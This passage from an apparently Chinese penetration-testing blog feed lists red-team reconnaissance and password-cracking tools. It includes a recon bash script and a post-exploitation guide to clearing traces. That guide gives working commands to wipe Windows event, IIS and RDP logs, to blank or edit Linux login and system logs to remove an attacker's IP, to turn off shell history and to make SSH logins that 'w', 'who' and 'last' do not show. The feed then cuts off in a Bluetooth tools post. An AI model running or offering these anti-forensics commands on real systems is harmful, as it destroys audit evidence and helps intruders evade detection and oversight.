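On a real dump from section 2.2, replace sampleDump with the bytes of the _dump.dex file; a header whose magic or endian tag does not parse means the region boundaries taken from maps did not start at the dex, and a file_size larger than the dump means the region was cut short.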
<categories>
<category> Android </category>
</categories>
<tags>
<tag> Unpacking </tag>
<tag> Reverse engineering </tag>
<tag> frida </tag>
</tags>
</entry>
<entry>
<title>Red vs Blue - External Reconnaissance</title>
<link href="/2023/11/19/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97-%E5%A4%96%E5%9B%B4%E6%89%93%E7%82%B9/"/>
<url>/2023/11/19/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97-%E5%A4%96%E5%9B%B4%E6%89%93%E7%82%B9/</url>
<content type="html"><![CDATA[<h1 id="红蓝对抗-外围打点"><a href="#红蓝对抗-外围打点" class="headerlink" title="红蓝对抗-外围打点"></a>Red vs Blue - External Reconnaissance</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1. Introduction</h2><p>A collection of the approaches and tools used for external reconnaissance in the various competitions.</p><h2 id="2-信息收集"><a href="#2-信息收集" class="headerlink" title="2.信息收集"></a>2. Information gathering</h2><p>Start from three angles: <strong>network architecture</strong>, <strong>organizational structure</strong> and <strong>leaked information</strong>.</p><h3 id="网络架构"><a href="#网络架构" class="headerlink" title="网络架构"></a>Network architecture</h3><ul><li>Domain names</li></ul><p>Internet search engines, on-site search, Qichacha (企查查), ICP filing records plus subdomains</p><hr><p><strong>Search engines</strong>:</p><p>google</p><p>baidu</p><p><strong>Cyberspace mapping</strong>:</p><p>fofa</p><p>hunter</p><p><a href="https://www.secxxx.com/Tool/">tools by the secxxx.com expert</a></p><p><strong>Corporate information</strong>:</p><p>qcc</p><p>aiqicha</p><p><strong>Subdomain brute-force tools</strong>:</p><p><a href="https://github.com/projectdiscovery/subfinder">projectdiscovery/subfinder: Fast passive subdomain enumeration tool. (github.com)</a></p><p><a href="https://github.com/knownsec/ksubdomain">knownsec/ksubdomain: stateless subdomain brute-force tool (github.com)</a></p><p><a href="https://github.com/shmilylty/OneForAll">shmilylty/OneForAll: OneForAll is a powerful subdomain collection tool (github.com)</a></p><ul><li>Ports</li></ul><p><a href="https://github.com/nmap/nmap">nmap/nmap: Nmap - the Network Mapper. Github mirror of official SVN repository.</a></p><p>(nmap combined with <a href="https://github.com/scipag/vulscan">scipag/vulscan: Advanced vulnerability scanning with Nmap NSE (github.com)</a> can also scan for vulnerabilities)</p><p><a href="https://github.com/redtoolskobe/scaninfo">redtoolskobe/scaninfo: fast scan for redtools (github.com)</a></p><p><a href="https://github.com/robertdavidgraham/masscan">robertdavidgraham/masscan: TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. (github.com)</a></p><p><a href="https://github.com/XinRoom/go-portScan">XinRoom/go-portScan: High-performance port scanner. syn scanner (github.com)</a></p><p>Yujian (御剑)</p><ul><li>Neighbouring sites (other sites on the same host)</li></ul><p>Internet search engines, fofa fingerprint search</p><ul><li>Mini programs and apps</li></ul><p>Search for the target organization in WeChat, then capture the traffic of its mini programs and apps</p><ul><li>Directory brute-forcing</li></ul><p>dirsearch</p><p><strong>Comprehensive information-gathering tools</strong></p><p>Fine-grained collection for a single URL target</p><p><a href="https://github.com/kracer127/SiteScan">kracer127/SiteScan: a one-stop solution for the information-gathering tasks of penetration testing. Functions include domain/IP resolution history, nmap scans of common ports, subdomain collection, neighbouring-site collection, whois lookup, site architecture analysis, CMS detection, ICP filing lookup, CDN detection, WAF detection, admin-panel discovery, and an HTML report of the results. (github.com)</a></p><p><a href="https://github.com/xzajyjs/ThunderSearch">xzajyjs/ThunderSearch: [supports the Fofa, Shodan, Hunter, Zoomeye and Quake cyberspace search engines] lightning searcher; GUI (Mac/Windows) information-gathering tool for penetration testing; asset collection engine; hw red-team tool hvv (github.com)</a></p><p><a href="https://github.com/pingc0y/URLFinder">pingc0y/URLFinder: a fast, thorough and easy-to-use page information extractor that quickly discovers and extracts JS, URLs and sensitive information from pages. (github.com)</a></p><p><a href="https://github.com/Ekultek/WhatWaf">Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systems (github.com)</a></p><p><a href="https://github.com/TideSec/TideFinger">https://github.com/TideSec/TideFinger</a></p><p>Multi-target probing</p><p><a href="https://github.com/redtoolskobe/scaninfo">redtoolskobe/scaninfo: fast scan for redtools (github.com)</a></p><p><a href="https://github.com/EASY233/Finger">EASY233/Finger: a red-team tool for liveness probing across large asset sets and fingerprinting of priority target systems (github.com)</a></p><h3 id="组织架构"><a href="#组织架构" class="headerlink" title="组织架构"></a>Organizational structure</h3><p>Branches, subsidiaries, supply chain, personnel information</p><p>qcc</p><p>chinaz</p><p><a href="https://github.com/wgpsec/ENScan_GO">wgpsec/ENScan_GO: a tool built on the major corporate-information APIs to solve the difficulties met when gathering information on domestic (Chinese) companies. One-click collection and aggregated export of a holding company's ICP filings, apps, mini programs, WeChat official accounts and more. (github.com)</a></p><p><a href="https://github.com/laramies/theHarvester">laramies/theHarvester: E-mails, subdomains and names Harvester - OSINT (github.com)</a></p><h3 id="泄露信息"><a href="#泄露信息" class="headerlink" title="泄露信息"></a>Leaked information</h3><p>Keys, manuals, topology diagrams, source code, system names, usernames</p><p>Baidu Netdisk, Aliyun Drive</p><p>Baidu Wenku, Yuque, Douban</p><p>github, gitee</p><h2 id="3-扫描工具"><a href="#3-扫描工具" class="headerlink" title="3.扫描工具"></a>3. Scanning tools</h2><p><a href="https://github.com/chushuai/wscan">chushuai/wscan: an open-source security assessment tool supporting scans for common web security issues and custom POCs. It also provides machine-learning vulnerability detection and automated testing. (github.com)</a></p><p><a href="https://github.com/sullo/nikto">sullo/nikto: Nikto web server scanner (github.com)</a></p><p><a href="https://github.com/d3ckx1/Fvuln">d3ckx1/Fvuln: F-vuln (Find-Vulnerability) is an automation tool written for the author's own convenience at work, aimed at day-to-day security services, penetration testers and red teams. Its functions include live-IP probing, open-port probing, web service probing, web vulnerability scanning, brute-forcing of smb, ssh, ftp, mssql and other databases, and a large set of web vulnerability detection modules. (github.com)</a></p><p><a href="https://github.com/lcvvvv/kscan">lcvvvv/kscan: Kscan is an all-round scanner written in pure Go, with port scanning, protocol detection, fingerprinting and brute-forcing. It supports 1200+ protocols, 10000+ protocol fingerprints, 20000+ application fingerprints and brute-forcing of more than ten protocols. (github.com)</a></p><p><a href="https://github.com/givemefivw/SecurityServiceBox">givemefivw/SecurityServiceBox: a toolbox that serves both the day-to-day penetration work of security-service staff and batch vulnerability hunting. It bundles common tools for domain collection, directory scanning, IP scanning, fingerprinting and PoC verification so that a penetration test can start quickly. (github.com)</a></p><p><a href="https://github.com/veo/vscan">veo/vscan: an open-source, lightweight, fast, cross-platform website vulnerability scanner that helps you quickly detect website security risks. Features: port scan, fingerprint, nday check, admin brute, file fuzz (github.com)</a></p><p><a href="https://github.com/hktalent/scan4all">hktalent/scan4all: Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)… (github.com)</a></p><p><a href="https://github.com/projectdiscovery/nuclei">projectdiscovery/nuclei: Fast and customizable vulnerability scanner based on simple YAML based DSL. (github.com)</a></p><p><a href="https://github.com/sairson/Yasso">sairson/Yasso: a powerful internal-network penetration toolkit that lets Yasso move like the wind. Supports brute-forcing of rdp, ssh, redis, postgres, mongodb, mssql, mysql, winrm and other services, fast port scanning, strong web fingerprinting, and one-click exploitation of various built-in services (including fully interactive ssh login, mssql privilege escalation, one-click redis exploitation, mysql database queries, winrm lateral movement; several of them can run through a socks5 proxy) (github.com)</a></p><p><a href="https://github.com/Adminisme/ServerScan">Adminisme/ServerScan: ServerScan is a high-concurrency network scanning and service probing tool written in Golang. (github.com)</a></p><p><a href="https://github.com/chainreactors/gogo">chainreactors/gogo: a highly controllable and extensible automation engine for red teams (github.com)</a></p><p><a href="https://github.com/chaitin/xray">chaitin/xray: a complete security assessment tool supporting scans for common web security issues and custom poc | be sure to read the documentation before use (github.com)</a></p><p><a href="https://github.com/0xKayala/NucleiFuzzer">0xKayala/NucleiFuzzer: NucleiFuzzer is a Powerful Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc.. Vulnerabilities in Web Applications (github.com)</a></p><h2 id="4-bash脚本进行自动信息收集"><a href="#4-bash脚本进行自动信息收集" class="headerlink" title="4.bash脚本进行自动信息收集"></a>4. Automated information gathering with a bash script</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#! /bin/bash</span><br><span class="line">amass enum -active -d $1 -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o amass.txt</span><br><span class="line"> </span><br><span class="line">cat amass.txt | aquatone -ports xlarge -out aqua_$1</span><br><span class="line"> </span><br><span class="line">nuclei -l aqua_$1/aquatone_urls.txt -t ~/nuclei-templates -es info -o nuclei_$1.txt</span><br></pre></td></tr></table></figure><h2 id="5-综合平台"><a href="#5-综合平台" class="headerlink" title="5.综合平台"></a>5. Integrated platforms</h2><p><a href="https://github.com/hanc00l/nemo_go">hanc00l/nemo_go: Nemo is a simple platform for automated information gathering. By integrating common information-gathering tools and techniques, it automatically collects information on internal and Internet-facing assets, improving the efficiency of risk investigation and penetration testing. (github.com)</a></p><p><a href="https://github.com/TophantTechnology/ARL">TophantTechnology/ARL: ARL (Asset Reconnaissance Lighthouse) aims to quickly reconnoitre the Internet assets associated with a target and build a base asset inventory, helping in-house security teams and penetration testers reconnoitre and search assets effectively and discover weak points and the attack surface. (github.com)</a></p>]]></content>
<categories>
<category> Offense and Defense </category>
</categories>
<tags>
<tag> Offense and Defense </tag>
<tag> Information Gathering </tag>
<tag> Asset Mapping </tag>
</tags>
</entry>
<entry>
<title>Passwords</title>
<link href="/2023/11/18/%E5%AF%86%E7%A0%81%E7%9B%B8%E5%85%B3/"/>
<url>/2023/11/18/%E5%AF%86%E7%A0%81%E7%9B%B8%E5%85%B3/</url>
<content type="html"><![CDATA[<h1 id="密码相关"><a href="#密码相关" class="headerlink" title="Passwords"></a>Passwords</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1. Introduction"></a>1. Introduction</h2><p>During penetration testing you need to build wordlists or crack the corresponding passwords; the related tools are collected here</p><h2 id="2-密码字典构建"><a href="#2-密码字典构建" class="headerlink" title="2. Building password wordlists"></a>2. Building password wordlists</h2><p>Password wordlists are assembled from public wordlist collections and generated from the information gathered in the earlier phases</p><h4 id="公开字典集合"><a href="#公开字典集合" class="headerlink" title="Public wordlist collections"></a>Public wordlist collections</h4><ul><li>General wordlists</li></ul><p><a href="https://github.com/TheKingOfDuck/fuzzDicts">TheKingOfDuck/fuzzDicts: Web pentesting fuzz wordlists; one is enough. (github.com)</a></p><p><a href="https://github.com/insightglacier/Dictionary-Of-Pentesting">insightglacier/Dictionary-Of-Pentesting: Dictionary collection project such as Pentesing, Fuzzing, Bruteforce and BugBounty. (github.com)</a></p><p><a href="https://github.com/a3vilc0de/PentesterSpecialDict">a3vilc0de/PentesterSpecialDict: Dictionary for penetration testers happy hacker (github.com)</a></p><p><a href="https://github.com/danielmiessler/SecLists">danielmiessler/SecLists: SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. (github.com)</a></p><ul><li>Password wordlists</li></ul><p><a href="https://github.com/ohmybahgosh/RockYou2021.txt">ohmybahgosh/RockYou2021.txt: RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists. RockYou2021.txt DOES NOT CONTAIN USER:PASS logins! (github.com)</a></p><p><a href="https://github.com/k8gege/PasswordDic">k8gege/PasswordDic: Top 100 weak passwords 2011-2019, Top 1000 passwords, server SSH/VPS passwords, admin panel passwords, database passwords, subdomain wordlist (github.com)</a></p><p><a href="https://github.com/rootphantomer/Blasting_dictionary">rootphantomer/Blasting_dictionary: Brute-force wordlists (github.com)</a></p><h4 id="字典生成工具"><a href="#字典生成工具" class="headerlink" title="Wordlist generators"></a>Wordlist generators</h4><p><a href="https://github.com/LandGrey/pydictor">LandGrey/pydictor: A powerful and useful hacker dictionary builder for a brute-force attack (github.com)</a></p><p><a href="https://github.com/zgjx6/SocialEngineeringDictionaryGenerator">zgjx6/SocialEngineeringDictionaryGenerator: A social-engineering password generator that builds passwords from personal information (github.com)</a></p><p><a href="https://github.com/achuna33/weak_password">achuna33/weak_password: Generates weak-password wordlists from names, ID numbers, QQ numbers, phone numbers, birthdays, domains and e-mail addresses (github.com)</a></p><h2 id="3-密码破解"><a href="#3-密码破解" class="headerlink" title="3. Password cracking"></a>3. Password cracking</h2><p>Sometimes password hashes have to be cracked to recover the plaintext</p><p>Distributed hashcat</p><p><a href="https://github.com/hashtopolis/server">hashtopolis/server: Hashtopolis - a Hashcat wrapper for distributed password recovery (github.com)</a></p><p>Offline cracking plus online lookup APIs (very handy; avoids querying MD5 hashes on several websites)</p><p><a href="https://github.com/L-codes/pwcrack-framework">L-codes/pwcrack-framework: Password Crack Framework (github.com)</a></p><p>john</p><p><a href="https://github.com/openwall/john">openwall/john: John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs (github.com)</a></p><p>hashcat</p><p><a href="https://github.com/hashcat/hashcat">hashcat/hashcat: World’s fastest and most advanced password recovery utility (github.com)</a></p><h4 id="常用软件密码破解"><a href="#常用软件密码破解" class="headerlink" title="Recovering passwords of common software"></a>Recovering passwords of common software</h4><ul><li>Browsers, QQ, etc.</li></ul><p><a href="https://github.com/moonD4rk/HackBrowserData">moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. A cross-platform browser data export and decryption tool. (github.com)</a></p><ul><li>Xshell</li></ul><p><a href="https://github.com/JDArmy/SharpXDecrypt">JDArmy/SharpXDecrypt: Password recovery tool for all Xshell versions (github.com)</a></p>]]></content>
<categories>
<category> Tools </category>
</categories>
<tags>
<tag> Passwords </tag>
<tag> Brute Force </tag>
<tag> Password Spraying </tag>
</tags>
</entry>
<entry>
<title>Some Python Tips</title>
<link href="/2023/11/14/python%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7/"/>
<url>/2023/11/14/python%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7/</url>
<content type="html"><![CDATA[<h1 id="Python-一些技巧"><a href="#Python-一些技巧" class="headerlink" title="Some Python Tips"></a>Some Python Tips</h1><h2 id="打包文件"><a href="#打包文件" class="headerlink" title="Packaging"></a>Packaging</h2><p>Used to produce an exe that does not depend on a Python environment</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># static single-file bundle without a console window</span><br><span class="line">pyinstaller --onefile --noconsole your_script_name.py</span><br><span class="line"></span><br><span class="line"># static single-file bundle with a console window</span><br><span class="line">pyinstaller --onefile your_script_name.py</span><br></pre></td></tr></table></figure><h2 id="生成requirement"><a href="#生成requirement" class="headerlink" title="Generating requirements.txt"></a>Generating requirements.txt</h2><p>Makes it easy for others to deploy a project you wrote</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">pip install pipreqs</span><br><span class="line">pipreqs . --encoding=utf8 --force</span><br></pre></td></tr></table></figure><h2 id="包管理"><a href="#包管理" class="headerlink" title="Package management"></a>Package management</h2><p>Avoids conflicts between multiple Python packages</p><h3 id="安装venv"><a href="#安装venv" class="headerlink" title="Installing venv"></a>Installing venv</h3><p>Linux</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo apt install python3-venv</span><br></pre></td></tr></table></figure><p>Windows ships with it</p><h3 id="创建虚拟环境"><a href="#创建虚拟环境" class="headerlink" title="Creating a virtual environment"></a>Creating a virtual environment</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python -m venv test_env</span><br></pre></td></tr></table></figure><h4 id="linux激活"><a href="#linux激活" class="headerlink" title="Activating on Linux"></a>Activating on Linux</h4><figure class="highlight text"><table><tr><td class="code"><pre><span class="line">source ./test_env/bin/activate</span><br></pre></td></tr></table></figure><h4 id="windows激活"><a href="#windows激活" class="headerlink" title="Activating on Windows"></a>Activating on Windows</h4><figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">.\test_env\Scripts\Activate.ps1</span><br></pre></td></tr></table></figure><p>Packages installed while the virtual environment is active are placed in that environment's directory and do not affect other environments</p>]]></content>
<categories>
<category> Tools </category>
</categories>
<tags>
<tag> Development </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title>Post-exploitation: Clearing Traces</title>
<link href="/2023/10/26/%E5%90%8E%E6%B8%97%E9%80%8F-%E6%B8%85%E7%90%86%E7%97%95%E8%BF%B9/"/>
<url>/2023/10/26/%E5%90%8E%E6%B8%97%E9%80%8F-%E6%B8%85%E7%90%86%E7%97%95%E8%BF%B9/</url>
<content type="html"><![CDATA[<h1 id="后渗透-清理痕迹"><a href="#后渗透-清理痕迹" class="headerlink" title="Post-exploitation: Clearing Traces"></a>Post-exploitation: Clearing Traces</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1. Introduction"></a>1. Introduction</h2><p>You need to protect yourself properly during offensive and defensive engagements. This post collects trace-clearing methods for Windows and Linux.</p><h2 id="2-windows痕迹清理"><a href="#2-windows痕迹清理" class="headerlink" title="2. Clearing traces on Windows"></a>2. Clearing traces on Windows</h2><h3 id="使用msf清理"><a href="#使用msf清理" class="headerlink" title="Clearing with msf"></a>Clearing with msf</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">meterpreter> run event_manager -c</span><br></pre></td></tr></table></figure><h3 id="有远程权限清理的手动清理路径"><a href="#有远程权限清理的手动清理路径" class="headerlink" title="Manual path when you have remote access"></a>Manual path when you have remote access</h3><p>Start - Programs - Administrative Tools - Computer Management - System Tools - Event Viewer - Clear Log</p><h3 id="使用wevtutil清理"><a href="#使用wevtutil清理" class="headerlink" title="Clearing with wevtutil"></a>Clearing with wevtutil</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">wevtutil el               list all log names on the system</span><br><span class="line">wevtutil cl system        clear the System log</span><br><span class="line">wevtutil cl application   clear the Application log</span><br><span class="line">wevtutil cl security      clear the Security log</span><br></pre></td></tr></table></figure><h3 id="用powershell全清理"><a href="#用powershell全清理" class="headerlink" title="Clearing everything with PowerShell"></a>Clearing everything with PowerShell</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}" & Powershell -Command "Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}"</span><br></pre></td></tr></table></figure><h3 id="清理iis"><a href="#清理iis" class="headerlink" title="Clearing IIS logs"></a>Clearing IIS logs</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1. Stop the service:</span><br><span class="line">net stop w3svc</span><br><span class="line">2. Delete all files in the log directory:</span><br><span class="line">del *.*</span><br><span class="line">3. Start the service again:</span><br><span class="line">net start w3svc</span><br><span class="line"></span><br><span class="line">IIS log locations:</span><br><span class="line">Windows Server 2003, IIS 6 log path:</span><br><span class="line">C:\Windows\System32\LogFiles</span><br><span class="line">Windows Server 2008 R2, 2012, 2016, 2019, IIS 7 and later log path:</span><br><span class="line">C:\inetpub\logs\LogFiles</span><br><span class="line"></span><br><span class="line">Because IIS automatically creates a log folder for each website, the actual IIS logs live in a subfolder of LogFiles, for example:</span><br><span class="line">C:\Windows\System32\LogFiles\W3SVC2</span><br><span class="line">C:\inetpub\logs\LogFiles\W3SVC1</span><br></pre></td></tr></table></figure><h3 id="rdp记录清理"><a href="#rdp记录清理" class="headerlink" title="Clearing RDP history"></a>Clearing RDP history</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f&reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f&reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"&del /ah %homepath%\documents\default.rdp</span><br></pre></td></tr></table></figure><h3 id="windows文件安全删除"><a href="#windows文件安全删除" class="headerlink" title="Secure file deletion on Windows"></a>Secure file deletion on Windows</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1. Overwrite repeatedly with the Cipher command:</span><br><span class="line">cipher /w:D:\<filename></span><br><span class="line">2. Overwrite-format with the Format command:</span><br><span class="line">format D: /P:8</span><br><span class="line"></span><br><span class="line">Tips:</span><br><span class="line">1. After deleting a file, the Cipher command's /W switch repeatedly writes other data over the disk space of the deleted file, destroying the data so that it cannot be recovered.</span><br><span class="line">2. With the /P switch, Format first zeroes every sector and then overwrites it with random data, and can do so several times; the command above overwrites drive D with random data 8 times.</span><br></pre></td></tr></table></figure><h3 id="替换日志"><a href="#替换日志" class="headerlink" title="Replacing logs"></a>Replacing logs</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1. Use a script to stop log recording:</span><br><span class="line">https://github.com/hlldz/Invoke-Phant0m</span><br><span class="line"></span><br><span class="line">2. Deleting single Windows log entries:</span><br><span class="line">https://github.com/QAX-A-Team/EventCleaner</span><br><span class="line"></span><br><span class="line">3. Forging Windows log entries:</span><br><span class="line">eventcreate -l system -so administrator -t warning -d "this is a test" -id 500</span><br></pre></td></tr></table></figure><h2 id="3-linux痕迹清理"><a href="#3-linux痕迹清理" class="headerlink" title="3. Clearing traces on Linux"></a>3. Clearing traces on Linux</h2><p>First deal with the files whose names begin with .bash, such as <code>.bash_history</code> or <code>.bash_logout</code></p><p>Typing <code>HISTSIZE=0 && HISTFILESIZE=0</code> directly in the current shell clears both the cached history and the records in <code>~/.bash_history</code>; adding <code>HISTSIZE=0 && HISTFILESIZE=0</code> to the <code>~/.bashrc</code> initialisation file means no history is recorded whenever a shell is opened.</p><h3 id="本次不记录任何信息"><a href="#本次不记录任何信息" class="headerlink" title="Record nothing in this session"></a>Record nothing in this session</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0</span><br></pre></td></tr></table></figure><h3 id="清除history"><a href="#清除history" class="headerlink" title="Clearing history"></a>Clearing history</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">vim ~/.bash_history</span><br><span class="line">Delete the unwanted parts; dd deletes a whole line</span><br><span class="line">Esc, type :wq, Enter</span><br><span class="line"></span><br><span class="line">Clear the current user's history</span><br><span class="line">history -c</span><br></pre></td></tr></table></figure><h3 id="linux日志全清理"><a href="#linux日志全清理" class="headerlink" title="Clearing all Linux logs"></a>Clearing all Linux logs</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/messages;echo ok</span><br><span class="line">1. Clear failed login records:</span><br><span class="line">echo > /var/log/btmp</span><br><span class="line"></span><br><span class="line">2. Clear successful login records:</span><br><span class="line">echo > /var/log/wtmp</span><br><span class="line"></span><br><span class="line">3. Clear users' last login times:</span><br><span class="line">echo > /var/log/lastlog</span><br><span class="line"></span><br><span class="line">4. Clear information on currently logged-in users:</span><br><span class="line">echo > /var/log/utmp</span><br><span class="line"></span><br><span class="line">5. Clear the security log:</span><br><span class="line">cat /dev/null > /var/log/secure</span><br><span class="line"></span><br><span class="line">6. Clear the system log:</span><br><span class="line">cat /dev/null > /var/log/messages</span><br></pre></td></tr></table></figure><h3 id="替换"><a href="#替换" class="headerlink" title="Replacing"></a>Replacing</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Delete every line matching a string, such as today's date or your own login IP:</span><br><span class="line">sed -i '/10.10.10.10/d' /var/log/messages</span><br><span class="line"></span><br><span class="line">Replace the login IP address globally:</span><br><span class="line">sed -i 's/10.10.10.10/192.168.1.1/g' secure</span><br></pre></td></tr></table></figure><h3 id="linux-web日志清理"><a href="#linux-web日志清理" class="headerlink" title="Clearing Linux web logs"></a>Clearing Linux web logs</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Replace the IP address in the log directly:</span><br><span class="line">sed -i 's/10.10.10.10/192.168.1.1/g' access.log</span><br><span class="line"></span><br><span class="line">Remove only the related entries:</span><br><span class="line">Use grep -v to drop the related lines:</span><br><span class="line">grep -v evil.php /var/log/nginx/access.log > tmp.log</span><br><span class="line"></span><br><span class="line">Overwrite the original log with the modified one:</span><br><span class="line">cat tmp.log > /var/log/nginx/access.log</span><br></pre></td></tr></table></figure><h3 id="linux-隐身登录ssh-(不被w-who-last命令检测)"><a href="#linux-隐身登录ssh-(不被w-who-last命令检测)" class="headerlink" title="Stealth SSH login on Linux (not shown by the w, who and last commands)"></a>Stealth SSH login on Linux (not shown by the w, who and last commands)</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ssh -T root@10.10.10.10 /bin/bash -i</span><br></pre></td></tr></table></figure><h3 id="不记录ssh公钥"><a href="#不记录ssh公钥" class="headerlink" title="Not recording the SSH host public key"></a>Not recording the SSH host public key</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ssh -o UserKnownHostsFile=/dev/null -T root@10.10.10.10 /bin/bash -i</span><br></pre></td></tr></table></figure><h3 id="文件安全删除"><a href="#文件安全删除" class="headerlink" title="Secure file deletion"></a>Secure file deletion</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">The shred command erases data, overwriting 3 times by default; -n sets the number of overwrites:</span><br><span class="line">shred -f -u -z -v -n 8 <file to delete></span><br><span class="line"></span><br><span class="line">dd command:</span><br><span class="line">dd if=/dev/zero of=<file to delete> bs=<block size> count=<number of blocks></span><br><span class="line"></span><br><span class="line">wipe command:</span><br><span class="line">wipe <file to delete></span><br></pre></td></tr></table></figure><h2 id="4-参考链接"><a href="#4-参考链接" class="headerlink" title="4. References"></a>4. References</h2><p><a href="https://www.oreilly.com/library/view/metasploit-revealed-secrets/9781788624596/fd3960e0-0d84-47e4-9bda-d9efa87a5bd8.xhtml">Wiping logs from target with clearev command - Metasploit Revealed: Secrets of the Expert Pentester [Book] (oreilly.com)</a></p><p><a href="https://websec.readthedocs.io/zh/latest/intranet/windows/trace.html">6.1.4. Trace Clearing - Web Security Study Notes 1.0 documentation (websec.readthedocs.io)</a></p><p><a href="https://websec.readthedocs.io/zh/latest/intranet/linux/trace.html">6.2.3. Trace Clearing - Web Security Study Notes 1.0 documentation (websec.readthedocs.io)</a></p><p><a href="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448905971&idx=1&sn=583df1dcc8e899a48402125998f14e7a&chksm=8b55c6aebc224fb8941b0eb02bcc8fa7e9c293ed6ea15ae2f6bd234e4b539d9570d75ea5132e&cur_album_id=2726754431161352194&scene=189#wechat_redirect">Windows Intrusion Trace Clearing Techniques (qq.com)</a></p><p><a href="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448905988&idx=1&sn=224748ca695f1aa67041a2752258c357&chksm=8b55c759bc224e4f43e6db51e801745bed2209946a2af89b15da1daae95cfc98c3819658d843&cur_album_id=2726754431161352194&scene=189#wechat_redirect">Linux Intrusion Trace Clearing Techniques (qq.com)</a></p>]]></content>
<categories>
<category> Offense and Defense </category>
</categories>
<tags>
<tag> Clearing Traces </tag>
<tag> Penetration </tag>
<tag> Offense and Defense </tag>
</tags>
</entry>
<entry>
<title>Bluetooth Tools</title>
<link href="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/"/>
<url>/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/</url>
<content type="html"><![CDATA[<h1 id="蓝牙工具"><a href="#蓝牙工具" class="headerlink" title="Bluetooth Tools"></a>Bluetooth Tools</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1. Introduction"></a>1. Introduction</h2><p>To meet industrial-control and connected-vehicle testing needs, this post studies Bluetooth tools and testing methods.</p><h2 id="2-工具清单"><a href="#2-工具清单" class="headerlink" title="2. Tool list"></a>2. Tool list</h2><ul><li>hciconfig</li><li>hcitool</li><li>l2ping</li><li>sdptool</li><li>blueranger</li><li>bluetoothctl</li><li>gatttool</li><li>Bettercap</li><li>wireshark</li></ul><h3 id="2-1前期准备"><a href="#2-1前期准备" class="headerlink" title="2.1 Preparation"></a>2.1 Preparation</h3><ul><li>A physical Kali machine (or a driverless USB Bluetooth adapter)</li><li>A target Bluetooth device (for classic Bluetooth a headset or phone will do; for BLE use an IoT device such as a Bluetooth socket or a BLE head unit)</li></ul><p>Turn on the Bluetooth service in Kali</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134631198.png" alt="image-20231022134631198"></p><h3 id="2-2-hciconfig"><a href="#2-2-hciconfig" class="headerlink" title="2.2 hciconfig"></a>2.2 hciconfig</h3><p>The hciconfig command shows details of the local Bluetooth adapter, such as its BD address.</p><p>1. Use <code>hciconfig</code> to check that the adapter is recognised; normally it looks like this:</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134509384.png" alt="image-20231022134509384"></p><p>If you use a Kali VM with a driverless USB adapter, an extra <code>hci1</code> device appears.</p><p>2. If the adapter is not enabled, bring it up</p><figure class="highlight 